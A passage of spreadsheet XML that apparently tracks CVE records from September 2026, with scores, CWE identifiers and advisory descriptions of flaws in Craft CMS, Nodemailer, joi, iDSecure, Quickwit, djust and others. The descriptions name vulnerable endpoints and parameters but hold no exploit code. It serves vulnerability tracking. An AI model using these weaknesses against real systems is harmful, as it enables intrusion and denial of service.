          <t>NVD</t>
        </is>
      </c>
      <c r="G676" s="5" t="inlineStr"/>
      <c r="H676" s="5" t="inlineStr"/>
      <c r="I676" s="5" t="inlineStr"/>
      <c r="J676" s="5" t="inlineStr"/>
      <c r="K676" s="5" t="inlineStr"/>
      <c r="L676" s="5" t="inlineStr"/>
      <c r="M676" s="5" t="inlineStr"/>
      <c r="N676" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O676" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P676" s="5" t="inlineStr"/>
      <c r="Q676" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R676" s="5" t="inlineStr">
        <is>
          <t>Craft CMS 5.0.0-RC1 through versions before 5.11.0 incorrectly authorize the GraphQL draftCreator and revisionCreator fields: instead of requiring the user-data scope enforced by Gql::canQueryUsers() (usergroups.*:read), these fields are gated only on the elements.drafts:read / elements.revisions:read scopes, and their resolver returns a raw User element whose email, username, fullName, and addresses fields have no per-field authorization. A client holding only the drafts or revisions scope — including an unauthenticated client when the operator has enabled the public GraphQL schema with those scopes — can therefore harvest the email addresses, usernames, full names, and postal addresses of all draft/revision creators (typically site editors and administrators). The issue is fixed in 5.11.0.</t>
        </is>
      </c>
      <c r="S676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92594</t>
        </is>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B677" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92596</t>
        </is>
      </c>
      <c r="D677" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E677" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F677" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G677" s="5" t="inlineStr"/>
      <c r="H677" s="5" t="inlineStr"/>
      <c r="I677" s="5" t="inlineStr"/>
      <c r="J677" s="5" t="inlineStr"/>
      <c r="K677" s="5" t="inlineStr"/>
      <c r="L677" s="5" t="inlineStr"/>
      <c r="M677" s="5" t="inlineStr"/>
      <c r="N677" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O677" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P677" s="5" t="inlineStr"/>
      <c r="Q677" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R677" s="5" t="inlineStr">
        <is>
          <t>Nodemailer before 9.1.0 contains a quadratic time complexity vulnerability in the addressparser component that allows remote attackers to cause denial of service by supplying a crafted comma-separated address list. Attackers can send a single email with a large number of addresses to block the Node.js event loop for extended periods, consuming 100% CPU and freezing the process.</t>
        </is>
      </c>
      <c r="S677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92596</t>
        </is>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B678" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92599</t>
        </is>
      </c>
      <c r="D678" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E678" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F678" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G678" s="5" t="inlineStr"/>
      <c r="H678" s="5" t="inlineStr"/>
      <c r="I678" s="5" t="inlineStr"/>
      <c r="J678" s="5" t="inlineStr"/>
      <c r="K678" s="5" t="inlineStr"/>
      <c r="L678" s="5" t="inlineStr"/>
      <c r="M678" s="5" t="inlineStr"/>
      <c r="N678" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O678" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P678" s="5" t="inlineStr"/>
      <c r="Q678" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="R678" s="5" t="inlineStr">
        <is>
          <t>joi (npm package `joi`, hapi.js) versions &gt;=17.2.0 &lt;17.13.7 and &gt;=18.0.0 &lt;18.2.6 are vulnerable to regular expression denial of service in the `Joi.string().isoDate()` validation rule. One of the regular expressions the rule applies to the input is unanchored, so a valid ISO date followed by a long run of fractional-second digits causes the regex engine to restart its search from every position in the string, yielding time proportional to the square of the input length (about 1.4 s for 64 KB of digits and about 22 s for 256 KB). A remote attacker who can supply a string to an isoDate validation can stall the application with a single request. Fixed in 17.13.7 and 18.2.6; as a workaround, cap the length of the string before it reaches joi.</t>
        </is>
      </c>
      <c r="S678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92599</t>
        </is>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B679" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92625</t>
        </is>
      </c>
      <c r="D679" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E679" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F679" s="5" t="inlineStr">
        <is>
          <t>vulnreport@tenable.com</t>
        </is>
      </c>
      <c r="G679" s="5" t="inlineStr"/>
      <c r="H679" s="5" t="inlineStr"/>
      <c r="I679" s="5" t="inlineStr"/>
      <c r="J679" s="5" t="inlineStr"/>
      <c r="K679" s="5" t="inlineStr"/>
      <c r="L679" s="5" t="inlineStr"/>
      <c r="M679" s="5" t="inlineStr"/>
      <c r="N679" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O679" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P679" s="5" t="inlineStr"/>
      <c r="Q679" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R679" s="5" t="inlineStr">
        <is>
          <t>Control iD iDSecure versions prior to 4.8.3.0 are affected by an unauthenticated Denial of Service.
The /api/license/restartService endpoint is reachable without authentication and invokes an internal routine that terminates the iDSecure service process and relaunches it by way of a generated batch script. An unauthenticated remote attacker can call this endpoint repeatedly to hold the service in a continuous restart cycle, rendering it unavailable.</t>
        </is>
      </c>
      <c r="S679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92625</t>
        </is>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B680" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92626</t>
        </is>
      </c>
      <c r="D680" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E680" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F680" s="5" t="inlineStr">
        <is>
          <t>vulnreport@tenable.com</t>
        </is>
      </c>
      <c r="G680" s="5" t="inlineStr"/>
      <c r="H680" s="5" t="inlineStr"/>
      <c r="I680" s="5" t="inlineStr"/>
      <c r="J680" s="5" t="inlineStr"/>
      <c r="K680" s="5" t="inlineStr"/>
      <c r="L680" s="5" t="inlineStr"/>
      <c r="M680" s="5" t="inlineStr"/>
      <c r="N680" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O680" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P680" s="5" t="inlineStr"/>
      <c r="Q680" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R680" s="5" t="inlineStr">
        <is>
          <t>Control iD iDSecure versions prior to 4.8.3.0 are affected by an unauthenticated Denial of Service.
The /api/dguardintegration/dguardVersion endpoint dereferences DGuard integration login state that may be unset, raising an unhandled null reference exception. The exception is thrown from an asynchronous method that returns void, so it is not observed by a caller and can terminate the iDSecure process.</t>
        </is>
      </c>
      <c r="S680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92626</t>
        </is>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B681" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92719</t>
        </is>
      </c>
      <c r="D681" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E681" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F681" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G681" s="5" t="inlineStr"/>
      <c r="H681" s="5" t="inlineStr"/>
      <c r="I681" s="5" t="inlineStr"/>
      <c r="J681" s="5" t="inlineStr"/>
      <c r="K681" s="5" t="inlineStr"/>
      <c r="L681" s="5" t="inlineStr"/>
      <c r="M681" s="5" t="inlineStr"/>
      <c r="N681" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O681" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P681" s="5" t="inlineStr"/>
      <c r="Q681" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R681" s="5" t="inlineStr">
        <is>
          <t>Quickwit through 0.9.0 fails to validate the host and scheme of the queue_url parameter in SQS file sources, allowing attackers to make the node issue requests to arbitrary internal addresses. Attackers can supply a malicious queue_url to the create-source API to scan internal networks and fingerprint services based on connection response differences.</t>
        </is>
      </c>
      <c r="S681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92719</t>
        </is>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B682" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92784</t>
        </is>
      </c>
      <c r="D682" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E682" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F682" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G682" s="5" t="inlineStr"/>
      <c r="H682" s="5" t="inlineStr"/>
      <c r="I682" s="5" t="inlineStr"/>
      <c r="J682" s="5" t="inlineStr"/>
      <c r="K682" s="5" t="inlineStr"/>
      <c r="L682" s="5" t="inlineStr"/>
      <c r="M682" s="5" t="inlineStr"/>
      <c r="N682" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O682" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P682" s="5" t="inlineStr"/>
      <c r="Q682" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R682" s="5" t="inlineStr">
        <is>
          <t>@refinedev/inferencer through 7.0.0 fails to escape API field names when interpolating them into generated JSX source code. Attackers controlling the data provider can inject malicious JavaScript through crafted JSON property names that execute in the developer's browser when the Inferencer page renders.</t>
        </is>
      </c>
      <c r="S682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92784</t>
        </is>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B683" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92791</t>
        </is>
      </c>
      <c r="D683" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E683" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F683" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G683" s="5" t="inlineStr"/>
      <c r="H683" s="5" t="inlineStr"/>
      <c r="I683" s="5" t="inlineStr"/>
      <c r="J683" s="5" t="inlineStr"/>
      <c r="K683" s="5" t="inlineStr"/>
      <c r="L683" s="5" t="inlineStr"/>
      <c r="M683" s="5" t="inlineStr"/>
      <c r="N683" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O683" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P683" s="5" t="inlineStr"/>
      <c r="Q683" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R683" s="5" t="inlineStr">
        <is>
          <t>Uber Kraken through 0.1.29 fails to validate the tag parameter in the /tags/{tag} endpoint, allowing unauthenticated attackers to traverse outside the configured storage root. Attackers can use percent-encoded parent-directory segments in the tag parameter to read arbitrary files accessible to the testfs backend process.</t>
        </is>
      </c>
      <c r="S683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92791</t>
        </is>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B684" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92792</t>
        </is>
      </c>
      <c r="D684" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E684" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F684" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G684" s="5" t="inlineStr"/>
      <c r="H684" s="5" t="inlineStr"/>
      <c r="I684" s="5" t="inlineStr"/>
      <c r="J684" s="5" t="inlineStr"/>
      <c r="K684" s="5" t="inlineStr"/>
      <c r="L684" s="5" t="inlineStr"/>
      <c r="M684" s="5" t="inlineStr"/>
      <c r="N684" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O684" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P684" s="5" t="inlineStr"/>
      <c r="Q684" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R684" s="5" t="inlineStr">
        <is>
          <t>OpenNHP through 1.0.2 selects its trusted-execution attestation verifier based on attacker-supplied evidence containing a test_purpose key, causing the FallbackVerifier to execute unconditionally. Attackers can bypass attestation verification by including the test_purpose key in evidence and providing enrolled measure and serial number pairs from the allowlist to gain unauthorized access.</t>
        </is>
      </c>
      <c r="S684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92792</t>
        </is>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B685" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92794</t>
        </is>
      </c>
      <c r="D685" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E685" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F685" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G685" s="5" t="inlineStr"/>
      <c r="H685" s="5" t="inlineStr"/>
      <c r="I685" s="5" t="inlineStr"/>
      <c r="J685" s="5" t="inlineStr"/>
      <c r="K685" s="5" t="inlineStr"/>
      <c r="L685" s="5" t="inlineStr"/>
      <c r="M685" s="5" t="inlineStr"/>
      <c r="N685" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O685" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P685" s="5" t="inlineStr"/>
      <c r="Q685" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R685" s="5" t="inlineStr">
        <is>
          <t>OpenSign through 2.41.3 fails to validate caller identity in the getDocument cloud function when one-time-password verification is disabled. Attackers can supply a document identifier from guest signing links to retrieve complete document details including all signers' information, sender identity, and valid download tokens without authentication.</t>
        </is>
      </c>
      <c r="S685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92794</t>
        </is>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B686" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92815</t>
        </is>
      </c>
      <c r="D686" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E686" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F686" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G686" s="5" t="inlineStr"/>
      <c r="H686" s="5" t="inlineStr"/>
      <c r="I686" s="5" t="inlineStr"/>
      <c r="J686" s="5" t="inlineStr"/>
      <c r="K686" s="5" t="inlineStr"/>
      <c r="L686" s="5" t="inlineStr"/>
      <c r="M686" s="5" t="inlineStr"/>
      <c r="N686" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O686" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P686" s="5" t="inlineStr"/>
      <c r="Q686" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R686" s="5" t="inlineStr">
        <is>
          <t>changedetection.io through 0.60.6 fails to validate the Goto URL action in browser steps, allowing unauthenticated attackers to access internal addresses. Attackers can supply arbitrary internal URLs in the optional_value parameter to retrieve responses from restricted network locations.</t>
        </is>
      </c>
      <c r="S686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92815</t>
        </is>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B687" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9336</t>
        </is>
      </c>
      <c r="D687" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E687" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F687" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G687" s="5" t="inlineStr"/>
      <c r="H687" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I687" s="5" t="inlineStr"/>
      <c r="J687" s="5" t="inlineStr">
        <is>
          <t>ibm:websphere</t>
        </is>
      </c>
      <c r="K687" s="5" t="inlineStr">
        <is>
          <t>ibm:websphere_application_server</t>
        </is>
      </c>
      <c r="L687" s="5" t="inlineStr"/>
      <c r="M687" s="5" t="inlineStr"/>
      <c r="N687" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O687" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P687" s="5" t="inlineStr"/>
      <c r="Q687" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R687" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 is vulnerable to a denial of service, caused by sending a specially-crafted HTTP request to an administrative endpoint. A remote attacker could exploit this vulnerability to cause the server to exhaust filesystem space.</t>
        </is>
      </c>
      <c r="S687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9336</t>
        </is>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B688" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20222</t>
        </is>
      </c>
      <c r="D688" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E688" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F688" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G688" s="5" t="inlineStr"/>
      <c r="H688" s="5" t="inlineStr"/>
      <c r="I688" s="5" t="inlineStr"/>
      <c r="J688" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K688" s="5" t="inlineStr"/>
      <c r="L688" s="5" t="inlineStr"/>
      <c r="M688" s="5" t="inlineStr"/>
      <c r="N688" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O688" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P688" s="5" t="inlineStr"/>
      <c r="Q688" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R688" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the EIGRP implementation in Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, adjacent attacker to cause the device to reload unexpectedly, resulting in a denial of service (DoS) condition.
This vulnerability is due to improper resource management when handling EIGRP update messages. An attacker could exploit this vulnerability by sending crafted EIGRP updates at a high rate to an affected device. A successful exploit could allow the attacker to trigger a memory leak that will eventually cause the affected device to reload unexpectedly.</t>
        </is>
      </c>
      <c r="S688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20222</t>
        </is>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B689" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42784</t>
        </is>
      </c>
      <c r="D689" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E689" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F689" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G689" s="5" t="inlineStr"/>
      <c r="H689" s="5" t="inlineStr"/>
      <c r="I689" s="5" t="inlineStr"/>
      <c r="J689" s="5" t="inlineStr"/>
      <c r="K689" s="5" t="inlineStr"/>
      <c r="L689" s="5" t="inlineStr"/>
      <c r="M689" s="5" t="inlineStr"/>
      <c r="N689" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O689" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P689" s="5" t="inlineStr"/>
      <c r="Q689" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R689" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in sequoia-openpgp. The library incorrectly infers key flags for older certificates when a key flags subpacket is missing, leading to a discrepancy in how key capabilities are viewed. This key flag confusion allows an attacker to bypass the back-signature check. Consequently, an attacker can illegitimately bind an arbitrary subkey to their own certificate and forge signatures, completely compromising cryptographic integrity.</t>
        </is>
      </c>
      <c r="S689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42784</t>
        </is>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B690" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61590</t>
        </is>
      </c>
      <c r="D690" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E690" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F690" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G690" s="5" t="inlineStr"/>
      <c r="H690" s="5" t="inlineStr"/>
      <c r="I690" s="5" t="inlineStr"/>
      <c r="J690" s="5" t="inlineStr"/>
      <c r="K690" s="5" t="inlineStr"/>
      <c r="L690" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M690" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N690" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O690" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P690" s="5" t="inlineStr"/>
      <c r="Q690" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-668</t>
        </is>
      </c>
      <c r="R690" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, djust's observability endpoints expose live view/session state and a remote method-invocation surface (`eval_handler`). The localhost restriction was an opt-in middleware that the documented setup omits; the views themselves enforced only `DEBUG`. In the misconfigured-but-documented scenario (DEBUG on, middleware not installed) a non-localhost client could read live application state and invoke handlers remotely. This issue is fixed in djust 1.0.7. The localhost restriction is enforced in-view on every observability endpoint (no longer dependent on a separately-installed middleware), and `eval_handler` is restricted; gated requests receive a non-disclosing response. As a workaround, ensure `DEBUG=False` in production, and do not expose the observability endpoints to untrusted networks.</t>
        </is>
      </c>
      <c r="S690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61590</t>
        </is>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B691" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61592</t>
        </is>
      </c>
      <c r="D691" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E691" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F691" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G691" s="5" t="inlineStr"/>
      <c r="H691" s="5" t="inlineStr"/>
      <c r="I691" s="5" t="inlineStr"/>
      <c r="J691" s="5" t="inlineStr"/>
      <c r="K691" s="5" t="inlineStr"/>
      <c r="L691" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M691" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N691" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O691" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P691" s="5" t="inlineStr"/>
      <c r="Q691" s="5" t="inlineStr">
        <is>
          <t>CWE-384, CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R691" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, SSE sessions were keyed solely by a client-chosen `session_id` with no binding to the authenticated user — a control the WebSocket transport has but that was dropped on SSE. An attacker who learns (or a victim who leaks) a `session_id` could connect to the message endpoint and dispatch event handlers that execute with the victim's identity and state. This is fixed in djust 1.0.7. Each SSE session is bound to its owning principal at creation and cross-principal access is rejected; SSE session creation is additionally capped per principal. As a workaround, disable the SSE transport.</t>
        </is>
      </c>
      <c r="S691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61592</t>
        </is>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B692" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84003</t>
        </is>
      </c>
      <c r="D692" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E692" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F692" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G692" s="5" t="inlineStr"/>
      <c r="H692" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I692" s="5" t="inlineStr"/>
      <c r="J692" s="5" t="inlineStr"/>
      <c r="K692" s="5" t="inlineStr">
        <is>
          <t>microsoft:azure\/msal-node</t>
        </is>
      </c>
      <c r="L692" s="5" t="inlineStr"/>
      <c r="M692" s="5" t="inlineStr"/>
      <c r="N692" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O692" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
